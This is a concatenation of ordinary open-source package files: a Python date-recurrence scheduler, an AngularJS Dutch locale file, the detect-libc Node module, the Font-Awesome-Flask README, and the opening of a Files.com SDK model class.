2004-05-04 14:00:12, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
For example:
seconds(datetime.datetime(2004, 5, 4), 15, datetime.datetime(2004, 5, 5))
yields the sequence: 2004-05-04 00:00:00, 2004-05-04 00:00:15,
2004-05-04 00:00:30, ...
... 2004-05-05 23:59:15,
2004-05-05 23:59:30, 2004-05-05 23:59:45.
"""
if not hasattr(startDate, u'time'):
startDate = datetime.datetime.combine(startDate, datetime.time(0))
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(seconds=frequency)
def eachminute(startDate, seconds=0, endDate=None):
"""Yield the same time for each minute. Defaults to 0 seconds.
Yielded values are datetime.datetime objects.
For example:
eachminute(datetime.date(2004, 5, 4, 23, 55), 15)
yields the sequence: 2004-05-04 23:55:15, 2004-05-04 23:56:15,
2004-05-04 23:57:15, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be the first valid time after
midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
"""
seconds = int(seconds)
if hasattr(startDate, u'time'):
days, zerotime = sane_time(0, startDate.hour,
startDate.minute, seconds)
if days < 0 or zerotime < startDate.time():
days, zerotime = sane_time(0, startDate.hour,
startDate.minute + 1, seconds)
else:
days, zerotime = sane_time(0, 0, 0, seconds)
startDate = sane_date(startDate.year, startDate.month,
startDate.day + days)
startDate = datetime.datetime.combine(startDate, zerotime)
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(minutes=1)
def minutes(startDate, frequency=1, endDate=None):
"""Yield a sequence of datetimes, adding 'frequency' minutes each time.
For example:
minutes(datetime.datetime(2004, 5, 4, 14), 30)
yields the sequence: 2004-05-04 14:00:00, 2004-05-04 14:30:00,
2004-05-04 15:00:00, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
For example:
minutes(datetime.datetime(2004, 5, 4), 15, datetime.datetime(2004, 5, 5))
yields the sequence: 2004-05-04 00:00:00, 2004-05-04 00:15:00,
2004-05-04 00:30:00, ...
... 2004-05-05 23:15:00,
2004-05-05 23:30:00, 2004-05-05 23:45:00.
"""
if not hasattr(startDate, u'time'):
startDate = datetime.datetime.combine(startDate, datetime.time(0))
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(minutes=frequency)
def eachhour(startDate, minutes=0, seconds=0, endDate=None):
"""Yield the same time for each hour. Defaults to 00:00.
Yielded values are datetime.datetime objects.
For example:
eachhour(datetime.date(2004, 5, 4, 6), 15)
yields the sequence: 2004-05-04 06:15:00, 2004-05-04 07:15:00,
2004-05-04 08:15:00, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be the first valid time after
midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
"""
minutes = int(minutes)
seconds = int(seconds)
if hasattr(startDate, u'time'):
zerotime = datetime.time(startDate.hour, minutes, seconds)
if zerotime < startDate.time():
if zerotime.hour < 23:
zerotime = datetime.time(zerotime.hour + 1, minutes, seconds)
else:
zerotime = datetime.time(0, minutes, seconds)
startDate = sane_date(startDate.year, startDate.month,
startDate.day + 1)
else:
zerotime = datetime.time(0, minutes, seconds)
startDate = datetime.datetime.combine(startDate, zerotime)
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(hours=1)
def hours(startDate, frequency=1, endDate=None):
"""Yield a sequence of datetimes, adding 'frequency' hours each time.
For example:
hours(datetime.datetime(2004, 5, 4, 14), 6)
yields the sequence: 2004-05-04 14:00:00, 2004-05-04 20:00:00,
2004-05-05 2:00:00, ...
If startDate has no time component (i.e. if it is a datetime.date),
then the first yielded time will be midnight (0:00:00) on that date.
If endDate has no time component (i.e. if it is a datetime.date),
then the last yielded time will be the last valid time before
midnight on that date.
For example:
hours(datetime.datetime(2004, 5, 4), 8, datetime.datetime(2004, 5, 5))
yields the sequence: 2004-05-04 00:00:00, 2004-05-04 08:00:00,
2004-05-04 16:00:00, 2004-05-05 00:00:00,
2004-05-05 08:00:00, 2004-05-05 16:00:00.
"""
if not hasattr(startDate, "time"):
startDate = datetime.datetime.combine(startDate, datetime.time(0))
if endDate and not hasattr(endDate, "time"):
endDate = datetime.datetime.combine(endDate, datetime.time(23, 59, 59))
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(hours=frequency)
def time_from_str(timeofday):
atoms = timeofday.split(u":")
def pop_or_zero():
try:
return int(atoms.pop(0))
except TypeError:
raise ValueError("The supplied time '%s' could not be parsed."
% timeofday)
except IndexError:
return 0
hour = pop_or_zero()
minute = pop_or_zero()
second = pop_or_zero()
return datetime.time(hour, minute, second)
def eachday(startDate, timeofday=None, endDate=None):
"""Yield the same time-of-day for each day. Defaults to midnight.
Yielded values are datetime.datetime objects.
For example:
eachday(datetime.date(2004, 5, 4), datetime.time(14, 3, 0))
yields the sequence: 2004-05-04 14:03:00, 2004-05-05 14:03:00,
2004-05-06 14:03:00, ...
timeofday may be a datetime.time, as in the above example, or it
may be a string, of the form "hour:min:sec". Seconds and minutes
may be omitted if their colon ":" separator is also omitted. So
the example above could be rewritten:
eachday(datetime.date(2004, 5, 4), "14:03")
"""
if timeofday is None:
timeofday = datetime.time(0)
elif isinstance(timeofday, (str, unicode)):
timeofday = time_from_str(timeofday)
# If the timeofday is less than the time of startDate,
# don't include the startDate in the results.
try:
if timeofday < startDate.time():
startDate = sane_date(startDate.year, startDate.month,
startDate.day + 1)
except AttributeError:
# startDate is a datetime.date, and has no time() attribute
pass
startDate = datetime.datetime.combine(startDate, timeofday)
# Now that we've coerced our startDate to a datetime, we need to
# do the same thing to endDate so we can compare them.
if endDate and not hasattr(endDate, "time"):
endDate = datetime.datetime.combine(endDate, timeofday)
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(1)
def eachweekday(startDate, weekday, timeofday=None, endDate=None):
"""Yield the same time-of-day each week for the given day. The time-of-day
defaults to midnight.
Yielded values are datetime.datetime objects.
For example:
eachweekday(datetime.date(2006, 8, 10), 3, datetime.time(14, 3, 0))
yields the sequence: 2006-08-11 14:03:00, 2006-08-18 14:03:00,
2006-08-25 14:03:00, ...
timeofday may be a datetime.time, as in the above example, or it
may be a string, of the form "hour:min:sec". Seconds and minutes
may be omitted if their colon ":" separator is also omitted. So
the example above could be rewritten:
eachday(datetime.date(2004, 5, 4), "14:03")
"""
if timeofday is None:
timeofday = datetime.time(0)
elif isinstance(timeofday, (str, unicode)):
timeofday = time_from_str(timeofday)
# get the given start time or datetime.time(0,0)
startTime = getattr(startDate, 'time', datetime.time)()
if startDate.weekday() > weekday or startTime > timeofday:
offset = (7 + weekday) - startDate.weekday()
while offset > 6:
offset -= 7
while offset <= 0:
offset += 7
startDate += datetime.timedelta(offset)
startDate = datetime.datetime.combine(startDate, timeofday)
# Now that we've coerced our startDate to a datetime, we need to
# do the same thing to endDate so we can compare them.
if endDate and not hasattr(endDate, "time"):
endDate = datetime.datetime.combine(endDate, timeofday)
end = getattr(endDate, 'date', lambda: None)()
day_iter = eachweek(startDate.date(), weekday, end)
startDate = datetime.datetime.combine(day_iter.next(), timeofday)
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate = datetime.datetime.combine(day_iter.next(), timeofday)
def days(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' days each time.
For example:
days(datetime.date(2004, 5, 4), 7)
yields the sequence: 2004-5-4, 2004-5-11, 2004-5-18, ...
"""
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(frequency)
def eachweek(startDate, weekday=0, endDate=None):
"""Yield the same day-of-the-week for each week. Defaults to Monday.
Yielded values are datetime.date objects.
Weekday follows the same days of the week as datetime.weekday().
For example:
mon, tue, wed, thu, fri, sat, sun = range(7)
eachweek(datetime.date(2004, 5, 4), thu)
yields the sequence: 2004-5-6, 2004-5-13, 2004-5-20, ...
If weekday is out of bounds (0-6), it will be brought in bounds.
"""
if hasattr(startDate, 'time'):
startDate = startDate.date()
weekday = int(weekday)
offset = (7 + weekday) - startDate.weekday()
while offset > 6:
offset -= 7
while offset < 0:
offset += 7
startDate += datetime.timedelta(offset)
return days(startDate, 7, endDate)
def weeks(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' weeks each time.
For example:
weeks(datetime.date(2004, 5, 4), 2)
yields the sequence: 2004-5-4, 2004-5-18, 2004-6-1, ...
"""
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(frequency * 7)
def eachmonth(startDate, day=1, endDate=None):
"""Yield the same day of each month. Defaults to the first day.
Yielded values are datetime.date objects.
If day is a positive number, return that date for each month,
starting with startDate. For example:
eachmonth(datetime.date(2004, 5, 4), 15)
yields the sequence: 2004-5-15, 2004-6-15, 2004-7-15, ...
If day is zero or negative, return the same date counting
backwards from the end of the month. For example:
eachmonth(datetime.date(2004, 5, 4), -5)
yields the sequence: 2004-5-26, 2004-6-25, 2004-7-26, ...
If day specifies a day which does not appear in every month,
then the closest valid date within that month will be used instead.
For example:
eachmonth(datetime.date(2004, 5, 4), 31)
yields the sequence: 2004-5-31, 2004-6-30, 2004-7-31, ...
If startDate is greater than what would otherwise be the first date
in the sequence, that first item is not yielded; instead, the next
item becomes the first item yielded.
If endDate is less than what would otherwise be the last date in the
sequence, that last item is not yielded, and the sequence ends.
"""
if hasattr(startDate, 'time'):
startDate = startDate.date()
day = int(day)
highzero = (day < 1)
index = 0
while True:
firstDate = sane_date(startDate.year, startDate.month + index, day, highzero)
if firstDate >= startDate:
break
index += 1
startDate = firstDate
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate = sane_date(startDate.year, startDate.month + 1, day, highzero)
def months(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' months each time.
For example:
months(datetime.date(2004, 5, 4), 3)
yields the sequence: 2004-5-4, 2004-8-4, 2004-11-4, ...
If the specified startDate contains a day which does not appear
in every month, then the corresponding day from the next month
will be used instead.
For example:
months(datetime.date(2004, 5, 31), 3)
yields the sequence: 2004-5-31, 2004-8-31, 2004-12-1, ...
If the frequency parameter is negative, the sequence descends.
"""
day = startDate.day
month = startDate.month
year = startDate.year
while True:
if endDate is not None:
if frequency < 0:
if startDate < endDate: break
else:
if startDate > endDate: break
yield startDate
month += frequency
startDate = sane_date(year, month, day)
def eachyear(startDate, month=1, day=1, endDate=None):
"""Yield the same day of the year for each year. Defaults to 1/1.
Yielded values are datetime.date objects.
If day and month are positive numbers, return that day/month for each
year, starting with startDate. For example:
eachyear(datetime.date(2004, 5, 4), 8, 15)
yields the sequence: 2004-8-15, 2005-8-15, 2006-8-15, ...
If month is zero or negative, return the same date counting months
backwards from the end of the year. For example:
eachyear(datetime.date(2004, 5, 4), -2, 15)
yields the sequence: 2004-10-15, 2005-10-15, 2006-10-15, ...
If day is zero or negative, return the same date counting days
backwards from the end of the month. For example:
eachyear(datetime.date(2004, 5, 4), -2, -1)
yields the sequence: 2004-10-30, 2005-10-30, 2006-10-30, ...
If day specifies a day which does not appear in the given month,
then the corresponding day from the next month will be used instead.
For example:
eachyear(datetime.date(2004, 5, 4), 5, 31)
yields the sequence: 2004-6-1, 2005-6-1, 2006-6-1, ...
If startDate is greater than what would otherwise be the first date
in the sequence, that first item is not yielded; instead, the next
item becomes the first item yielded.
If endDate is less than what would otherwise be the last date in the
sequence, that last item is not yielded, and the sequence ends.
"""
if hasattr(startDate, 'time'):
startDate = startDate.date()
month = int(month)
day = int(day)
index = 0
while True:
curDate = sane_date(startDate.year + index, month, day, True)
if curDate >= startDate:
break
index += 1
while (endDate is None) or (curDate <= endDate):
yield curDate
index += 1
curDate = sane_date(startDate.year + index, month, day, True)
def years(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' years each time.
For example:
years(datetime.date(2004, 5, 4), 3)
yields the sequence: 2004-5-4, 2007-5-4, 2010-5-4, ...
If the specified startDate contains a day which does not appear
in every year (i.e. leap years), then the corresponding day from
the next month will be used instead.
For example:
years(datetime.date(2004, 2, 29), 3)
yields the sequence: 2004-2-29, 2007-3-1, 2010-3-1, ...
If the frequency parameter is negative, the sequence descends.
"""
day = startDate.day
month = startDate.month
year = startDate.year
while True:
if endDate is not None:
if frequency < 0:
if startDate < endDate: break
else:
if startDate > endDate: break
yield startDate
year += frequency
startDate = sane_date(year, month, day)
def byunits(startDate, whichUnit, frequency=1, endDate=None):
"""Dispatch to the appropriate unit handler.
This really just exists to help out Locale series.
"""
frequency = int(frequency)
unithandler = (seconds, minutes, hours, days, weeks, months, years)
return unithandler[whichUnit](startDate, frequency, endDate)
def singledate(startDate, year, month=1, day=1, endDate=None):
"""Yield a single datetime.date if y/m/d occurs between start and end."""
year = int(year)
month = int(month)
day = int(day)
curDate = sane_date(year, month, day)
if curDate < startDate:
raise StopIteration
if (endDate is None) or (curDate <= endDate):
yield curDate
class Locale(object):
"""Language-specific expression matching.
To use a language other than English with Recurrence objects,
either subclass Locale and override the "patterns" dictionary,
or write some other callable that takes a description string
and returns a recurrence function and its "inner" args.
"""
patterns = {byunits: [r"([0-9]+) sec",
r"([0-9]+) min",
r"([0-9]+) hour",
r"([0-9]+) day",
r"([0-9]+) week",
r"([0-9]+) month",
r"([0-9]+) year",
],
# \S is any non-whitespace character.
eachday: r"([\S]+) (?:every|each) day",
eachweekday: [# don't match "month"
r"([\S]+) (?:every|each) mon(?!th)",
r"([\S]+) (?:every|each) tue",
r"([\S]+) (?:every|each) wed",
r"([\S]+) (?:every|each) thu",
r"([\S]+) (?:every|each) fri",
r"([\S]+) (?:every|each) sat",
r"([\S]+) (?:every|each) sun",
],
eachweek: [r"mon", r"tue", r"wed", r"thu", r"fri", r"sat", r"sun"],
eachmonth: r"(-?\d+) (?:every|each) month",
# Lookbehind for a digit and separator so we don't
# screw up singledate, below.
eachyear: [r"^(dummy entry to line up indexing)$",
r"(?<!\d\d[/ \-])(?:jan(?:uary)?|0?1)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:febr?(?:uary)?|0?2)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:mar(?:ch)?|0?3)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:apr(?:il)?|0?4)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:may|0?5)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:june?|0?6)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:july?|0?7)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:aug(?:ust)?|0?8)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:sept?(?:ember)?|0?9)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:oct(?:ober)?|10)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:nov(?:ember)?|11)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:dec(?:ember)?|12)[/ \-]([0-9]+)",
],
# ISO format (relaxed: 1-digit month and day OK,
# slash or space OK)
singledate: r"(\d\d\d\d)[/ \-]([01]?\d)[/ \-]([0123]?\d)",
}
regexes = {}
def __init__(self):
for key, regSet in self.patterns.items():
if isinstance(regSet, list):
self.regexes[key] = [re.compile(x, re.IGNORECASE)
for x in regSet]
else:
self.regexes[key] = re.compile(regSet, re.IGNORECASE)
def __call__(self, description):
for rule, regSet in self.regexes.items():
if isinstance(regSet, list):
for index, regex in enumerate(regSet):
matches = regex.match(description)
if matches:
return rule, (index,) + matches.groups()
else:
matches = regSet.match(description)
if matches:
return rule, matches.groups()
raise ValueError(u"The supplied description ('%s') "
u"could not be parsed." % description)
localeEnglish = Locale()
class Recurrence(object):
"""A recurrence pattern and its iterator.
The Recurrence class provides natural-language hooks for common recur
operations. The "description" parameter should be a set of keywords in
a natural language, which is then looked up in self.locale.regexes.
Usage:
import datetime, recur
firstDate = datetime.date(2004, 1, 7)
lastDate = datetime.date(2004, 2, 11)
for eachDate in recur.Recurrence(firstDate, "Saturday", lastDate):
print eachDate
2004-01-10
2004-01-17
2004-01-24
2004-01-31
2004-02-07
"""
def __init__(self, startDate=None, description="", endDate=None,
locale=localeEnglish):
"""
If startDate is None (not supplied), then it will be set
to the current date and time.
Leading and trailing whitespace will be stripped from the
description parameter.
"""
if startDate is None:
startDate = datetime.datetime.now()
description = description.strip()
self.startDate = startDate
self.description = description
self.endDate = endDate
self.locale = locale
self.function, args = locale(description)
self.args = (startDate,) + args + (endDate,)
# Form an initial generator, if for no other reason than to test args early.
self.reset()
def reset(self):
try:
self.generator = self.function(*self.args)
except TypeError, x:
x.args += self.args
raise
def __iter__(self):
self.reset()
return self
def next(self):
return self.generator.next()
deltazero = datetime.timedelta(0)
class Worker(object):
"""Perform work on a schedule.
You must override work(), which is called at each interval.
"""
def __init__(self, recurrence):
if isinstance(recurrence, basestring):
if recurrence:
recurrence = Recurrence(None, recurrence)
else:
recurrence = None
self.recurrence = recurrence
self.createdate = datetime.datetime.now()
self.lastrun = None
self.nextrun = None
self.curthread = None
self.active = True
def interval(self, next):
"""Return a timedelta (next - now).
if next is None, return None.
If next < now, return datetime.timedelta(0).
"""
if next is None:
return None
# next can be either a datetime.datetime or a datetime.date;
# get the correct representation of "now" from either one.
now = getattr(next, 'now', getattr(next, 'today'))()
return max(next - now, deltazero)
def advance(self):
"""Advance self.recurrence and set self.nextrun.
This function ignores dates which are in the past.
If the recurrence series is exhausted, self.nextrun will be None.
"""
if not self.recurrence:
self.nextrun = None
return
try:
next = self.recurrence.next()
except StopIteration:
# The recurrence series was exhausted immediately.
self.nextrun = None
return
# next can be either a datetime.datetime or a datetime.date;
# get the correct representation of "now" from either one.
now = getattr(next, 'now', getattr(next, 'today'))()
while True:
if next >= now:
self.nextrun = next
break
try:
next = self.recurrence.next()
except StopIteration:
# The recurrence series was exhausted.
self.nextrun = None
break
def start(self, secs=0):
"""Call self.run in a new thread."""
if self.active:
self.curthread = threading.Timer(secs, self.run)
self.curthread.start()
def run(self):
"""Prepare for work."""
if self.active:
self.work()
self.lastrun = datetime.datetime.now()
def work(self):
"""Perform the actual work. Must be overridden."""
raise NotImplementedError
def stop(self):
"""Stop work."""
self.active = False
if self.curthread:
self.curthread.cancel()
class Scheduler(object):
"""Collection of Workers governed by a single scheduler thread.
paused: a boolean flag indicating whether or not each Worker's start()
method should be executed at each interval. Notice that, even if
paused is True, the scheduler thread will still cycle, but Workers
will not be run at each interval.
terminated: a boolean flag indicating whether or not the Worker should
continue to cycle. If terminated is True, recurring Workers will
not schedule new threads.
"""
def __init__(self, workers=None):
if workers is None:
workers = {}
self.workers = workers
self.curthread = None
self.paused = False
self.terminated = False
def start(self):
"""Start a new recurring thread for all workers.
This sets self.terminated to False, but doesn't set self.paused.
"""
# Set nextrun for all workers
for worker in self.workers.values():
worker.advance()
self.terminated = False
self._cycle()
def _cycle(self):
"""Start a new Timer for the next worker."""
if self.terminated:
return
ivs = []
for w in self.workers.values():
next = w.nextrun
if next is not None:
ivs.append((w.interval(next), w))
if ivs:
ivs.sort()
iv, nextworker = ivs[0]
iv = (iv.days * 86400) + iv.seconds + (iv.microseconds / 1000000.0)
nextworker.advance()
self.curthread = threading.Timer(iv, self.run, (nextworker,))
self.curthread.start()
def run(self, worker):
"""Run the worker, then cycle again."""
if not self.paused and not self.terminated:
worker.start()
self._cycle()
def stop(self):
self.terminated = True
if self.curthread:
self.curthread.cancel()
for w in self.workers.values():
w.stop() | PypiClean |
/Flask-Statics-Helper-1.0.0.tar.gz/Flask-Statics-Helper-1.0.0/flask_statics/static/angular/i18n/angular-locale_nl.js | 'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
function getDecimals(n) {
n = n + '';
var i = n.indexOf('.');
return (i == -1) ? 0 : n.length - i - 1;
}
function getVF(n, opt_precision) {
var v = opt_precision;
if (undefined === v) {
v = Math.min(getDecimals(n), 3);
}
var base = Math.pow(10, v);
var f = ((n * base) | 0) % base;
return {v: v, f: f};
}
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"a.m.",
"p.m."
],
"DAY": [
"zondag",
"maandag",
"dinsdag",
"woensdag",
"donderdag",
"vrijdag",
"zaterdag"
],
"MONTH": [
"januari",
"februari",
"maart",
"april",
"mei",
"juni",
"juli",
"augustus",
"september",
"oktober",
"november",
"december"
],
"SHORTDAY": [
"zo",
"ma",
"di",
"wo",
"do",
"vr",
"za"
],
"SHORTMONTH": [
"jan.",
"feb.",
"mrt.",
"apr.",
"mei",
"jun.",
"jul.",
"aug.",
"sep.",
"okt.",
"nov.",
"dec."
],
"fullDate": "EEEE d MMMM y",
"longDate": "d MMMM y",
"medium": "d MMM y HH:mm:ss",
"mediumDate": "d MMM y",
"mediumTime": "HH:mm:ss",
"short": "dd-MM-yy HH:mm",
"shortDate": "dd-MM-yy",
"shortTime": "HH:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "\u20ac",
"DECIMAL_SEP": ",",
"GROUP_SEP": ".",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "\u00a4\u00a0",
"negSuf": "-",
"posPre": "\u00a4\u00a0",
"posSuf": ""
}
]
},
"id": "nl",
"pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]); | PypiClean |
/MetaCalls-0.0.5-cp310-cp310-manylinux2014_x86_64.whl/metacalls/node_modules/detect-libc/lib/detect-libc.js | 'use strict';
const childProcess = require('child_process');
const { isLinux, getReport } = require('./process');
const command = 'getconf GNU_LIBC_VERSION 2>&1 || true; ldd --version 2>&1 || true';
let commandOut = '';
const safeCommand = () => {
if (!commandOut) {
return new Promise((resolve) => {
childProcess.exec(command, (err, out) => {
commandOut = err ? ' ' : out;
resolve(commandOut);
});
});
}
return commandOut;
};
const safeCommandSync = () => {
if (!commandOut) {
try {
commandOut = childProcess.execSync(command, { encoding: 'utf8' });
} catch (_err) {
commandOut = ' ';
}
}
return commandOut;
};
/**
* A String constant containing the value `glibc`.
* @type {string}
* @public
*/
const GLIBC = 'glibc';
/**
* A String constant containing the value `musl`.
* @type {string}
* @public
*/
const MUSL = 'musl';
const isFileMusl = (f) => f.includes('libc.musl-') || f.includes('ld-musl-');
const familyFromReport = () => {
const report = getReport();
if (report.header && report.header.glibcVersionRuntime) {
return GLIBC;
}
if (Array.isArray(report.sharedObjects)) {
if (report.sharedObjects.some(isFileMusl)) {
return MUSL;
}
}
return null;
};
const familyFromCommand = (out) => {
const [getconf, ldd1] = out.split(/[\r\n]+/);
if (getconf && getconf.includes(GLIBC)) {
return GLIBC;
}
if (ldd1 && ldd1.includes(MUSL)) {
return MUSL;
}
return null;
};
/**
* Resolves with the libc family when it can be determined, `null` otherwise.
* @returns {Promise<?string>}
*/
const family = async () => {
let family = null;
if (isLinux()) {
family = familyFromReport();
if (!family) {
const out = await safeCommand();
family = familyFromCommand(out);
}
}
return family;
};
/**
* Returns the libc family when it can be determined, `null` otherwise.
* @returns {?string}
*/
const familySync = () => {
let family = null;
if (isLinux()) {
family = familyFromReport();
if (!family) {
const out = safeCommandSync();
family = familyFromCommand(out);
}
}
return family;
};
/**
* Resolves `true` only when the platform is Linux and the libc family is not `glibc`.
* @returns {Promise<boolean>}
*/
const isNonGlibcLinux = async () => isLinux() && await family() !== GLIBC;
/**
* Returns `true` only when the platform is Linux and the libc family is not `glibc`.
* @returns {boolean}
*/
const isNonGlibcLinuxSync = () => isLinux() && familySync() !== GLIBC;
const versionFromReport = () => {
const report = getReport();
if (report.header && report.header.glibcVersionRuntime) {
return report.header.glibcVersionRuntime;
}
return null;
};
const versionSuffix = (s) => s.trim().split(/\s+/)[1];
const versionFromCommand = (out) => {
const [getconf, ldd1, ldd2] = out.split(/[\r\n]+/);
if (getconf && getconf.includes(GLIBC)) {
return versionSuffix(getconf);
}
if (ldd1 && ldd2 && ldd1.includes(MUSL)) {
return versionSuffix(ldd2);
}
return null;
};
/**
* Resolves with the libc version when it can be determined, `null` otherwise.
* @returns {Promise<?string>}
*/
const version = async () => {
let version = null;
if (isLinux()) {
version = versionFromReport();
if (!version) {
const out = await safeCommand();
version = versionFromCommand(out);
}
}
return version;
};
/**
* Returns the libc version when it can be determined, `null` otherwise.
* @returns {?string}
*/
const versionSync = () => {
let version = null;
if (isLinux()) {
version = versionFromReport();
if (!version) {
const out = safeCommandSync();
version = versionFromCommand(out);
}
}
return version;
};
module.exports = {
GLIBC,
MUSL,
family,
familySync,
isNonGlibcLinux,
isNonGlibcLinuxSync,
version,
versionSync
}; | PypiClean |
/Font-Awesome-Flask-0.1.1.tar.gz/Font-Awesome-Flask-0.1.1/README.md | <!-- start docs-include-index -->
# Font-Awesome-Flask
[](https://img.shields.io/pypi/v/Font-Awesome-Flask)
[](https://pypi.org/project/Font-Awesome-Flask/)
[](https://results.pre-commit.ci/latest/github/sgraaf/font-awesome-flask/main)
[](https://font-awesome-flask.readthedocs.io/en/latest/?badge=latest)
[](https://img.shields.io/pypi/l/Font-Awesome-Flask)
Font-Awesome-Flask is an extension for [Flask](https://flask.palletsprojects.com/en/latest/) that adds support for [Font Awesome](https://fontawesome.com/) to your web application. It adds methods to load Font Awesome's resources (both `Web Fonts + CSS` and `SVG + JS` are supported) and render icons.
<!-- end docs-include-index -->
## Installation
<!-- start docs-include-installation -->
### From PyPI
Font-Awesome-Flask is available on [PyPI](https://pypi.org/project/Font-Awesome-Flask/). Install with `pip` or your package manager of choice:
```bash
pip install Font-Awesome-Flask
```
### From source
If you'd like, you can also install Font-Awesome-Flask from source (with [`flit`](https://flit.readthedocs.io/en/latest/)):
```bash
git clone https://github.com/sgraaf/font-awesome-flask.git
cd font-awesome-flask
python3 -m pip install flit
flit install
```
<!-- end docs-include-installation -->
## Documentation
Check out the [Font-Awesome-Flask documentation](https://font-awesome-flask.readthedocs.io/en/stable/) for the [User's Guide](https://font-awesome-flask.readthedocs.io/en/stable/usage.html) and [API Reference](https://font-awesome-flask.readthedocs.io/en/stable/api.html).
## Example
### Configuration
Font-Awesome-Flask can be configured via the [Flask configuration API](https://flask.palletsprojects.com/en/latest/config/), using the `config` attribute of the `Flask` object. These are the available configuration values along with their description:
| Configuration value | Default | Description |
| -------------------------- | ------- | ------------------------------------------------------------------ |
| `FONT_AWESOME_SERVE_LOCAL` | `False` | Whether to serve Font Awesome's resources locally or from the CDN. |
### Initialization
<!-- start docs-include-initialization -->
Initialize the extension with the Flask application normally...:
```python
from flask import Flask
from flask_font_awesome import FontAwesome
app = Flask(__name__)
font_awesome = FontAwesome(app)
```
... or using the [Application Factory](https://flask.palletsprojects.com/en/latest/patterns/appfactories/) pattern:
```python
from flask import Flask
from flask_font_awesome import FontAwesome
font_awesome = FontAwesome()
def create_app():
app = Flask(__name__)
font_awesome.init_app(app)
return app
```
<!-- end docs-include-initialization -->
### Loading resources
Font-Awesome-Flask provides three helper methods to load Font Awesome's resources: `font_awesome.load()`, `font_awesome.load_js()` and `font_awesome.load_css()`.
Font Awesome can be used either via [Web Fonts + CSS or via SVG + JS](https://fontawesome.com/docs/web/dig-deeper/webfont-vs-svg). Use the `load_css()` method for the former, and `load_js()` for the latter. You can also use the more general `load()`, which defaults to `SVG + JS`.
Whichever resource(s) you end up using, you can load them by including any of the `load()` methods in the head of your base template:
<!-- prettier-ignore -->
```html
<head>
...
{{ font_awesome.load_js() }}
...
</head>
<body>
...
</body>
```
### Rendering icons
Font-Awesome-Flask provides two ways of rendering icons: via the `font_awesome.render_icon()` and `font_awesome.render_stacked_icons()` methods...:
```python
{{font_awesome.render_icon("fas fa-house")}}
{{font_awesome.render_stacked_icons("fas fa-square", "fas fa-house")}}
```
... or via the [Jinja macros](https://jinja.palletsprojects.com/en/latest/templates/#macros) of the same names:
```
{% from 'font_awesome.html' import render_icon, render_stacked_icons %}
{{ render_icon('fas fa-house') }}
{{ render_stacked_icons('fas fa-square', 'fasfa-house') }}
```
| PypiClean |
/Files.com-1.0.1051-py3-none-any.whl/files_sdk/models/inbox_upload.py | import builtins
import datetime
from files_sdk.api import Api
from files_sdk.list_obj import ListObj
from files_sdk.exceptions import InvalidParameterError, MissingParameterError, NotImplementedError
class InboxUpload:
default_attributes = {
'inbox_registration': None, # InboxRegistration
'path': None, # string - Upload path This must be slash-delimited, but it must neither start nor end with a slash. Maximum of 5000 characters.
'created_at': None, # date-time - Upload date/time
}
def __init__(self, attributes=None, options=None):
if not isinstance(attributes, dict):
attributes = {}
if not isinstance(options, dict):
options = {}
self.set_attributes(attributes)
self.options = options
def set_attributes(self, attributes):
for (attribute, default_value) in InboxUpload.default_attributes.items():
setattr(self, attribute, attributes.get(attribute, default_value))
def get_attributes(self):
return {k: getattr(self, k, None) for k in InboxUpload.default_attributes if getattr(self, k, None) is not None}
# Parameters:
